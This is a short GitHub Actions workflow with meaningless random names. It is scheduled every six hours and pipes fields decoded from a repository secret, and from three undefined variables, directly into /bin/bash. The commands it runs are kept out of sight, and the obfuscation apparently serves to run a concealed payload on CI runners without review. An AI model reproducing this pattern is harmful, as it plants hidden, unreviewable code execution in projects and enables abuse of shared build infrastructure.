name: kutibuxue
on:
  workflow_dispatch:
  schedule:
    - cron: '22 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: kutibuxue
        env:
          r47: ${{ secrets.r47 }}
        run: |
          echo $r47 | jq -r .jx25 | /bin/bash
          echo $xnfhm08560 | jq -r .ps643 | /bin/bash
          echo $vrr920 | jq -r .x3352 | /bin/bash
          echo $nvn7147 | jq -r .i51 | /bin/bash

